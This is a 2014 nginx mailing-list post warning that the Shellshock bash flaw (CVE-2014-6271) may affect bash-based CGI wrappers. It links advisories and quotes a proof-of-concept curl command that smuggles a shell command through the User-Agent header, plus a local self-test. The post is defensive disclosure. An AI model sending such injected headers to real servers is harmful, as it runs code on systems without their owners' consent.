CVE-2014-6271 : Remote code execution through bash
mex
nginx-forum at nginx.us
Wed Sep 24 23:53:16 UTC 2014
hi list,
the following bug (Remote code execution through bash)
http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
**might** affect you if you use a shell/bash - based fcgi-wrapper like in
the following
receipt: http://wiki.nginx.org/Fcgiwrap /
http://wiki.nginx.org/FcgiwrapDebianInitScript
(did not tested it); if someone runs a shell-based cgi-wrapper and would
like to test the POC from
reddit, i'd be interested in the result :D
curl -v -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa'
http://example.com/path/to/file
at least i can confirm this affects bash-based CGIs.
ssh-based gitolite/gitlab et al are affected too.
local self-test:
# Output, wenn vulnerable:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
# Output, wenn not vulnerable:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
additional references:
Advisory CVE-2014-6271: remote code execution through bash (oss-sec-ml)
http://seclists.org/oss-sec/2014/q3/649
Analysis 1 oss-sec ml
http://seclists.org/oss-sec/2014/q3/650
Analysis 2 / RedHat
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
Naxsi-WAF Signatures
http://blog.dorvakt.org/2014/09/ruleset-update-possible-remote-code.html
regards & happy patching
(and sorry for this slightly OT-post)
mex
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253532,253532#msg-253532
More information about the nginx
mailing list